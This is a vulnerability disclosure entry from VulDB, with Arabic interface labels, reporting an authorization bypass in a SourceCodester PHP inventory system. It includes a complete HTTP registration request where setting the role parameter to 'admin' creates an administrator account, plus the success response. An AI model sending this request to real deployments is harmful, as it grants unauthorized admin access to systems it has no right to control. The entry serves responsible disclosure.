| عنوان | SourceCodester Inventory System using PHP and MySQL Source Code 0 Authorization Bypass |
|---|
| الوصف | During the assessment of the application it was observed that the code developer has missed a very critical path during the account creation. As the application allows to create accounts for the staff, there is a ROLE parameter when set to admin bypasses the restrction and creates the staff account by migrating it to admin.
For example:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Length: 84
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/Product_Inventory/register.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=4k1d9iv3r8rfq72isu5j3utogq
Connection: keep-alive
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=staff // VULNERABLE
Changing the above to the following creates an admin account.
full_name=fakeadmin&username=fakeadmin&password=fakeadmin&action=register&role=admin // VULNERABLE
While the response that is received is 200 and the account is created successfully.
{"success":true,"message":"User registered successfully!"} |
|---|
| المستخدم | Kamran Saifullah (UID 4218) |
|---|
| ارسال | 24/05/2026 08:56 AM (16 أيام منذ) |
|---|
| الاعتدال | 07/06/2026 06:01 PM (14 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 369139 [SourceCodester Inventory System 1.0 Account Creation users_handler.php ROLE تجاوز الصلاحيات] |
|---|
| النقاط | 17 |
|---|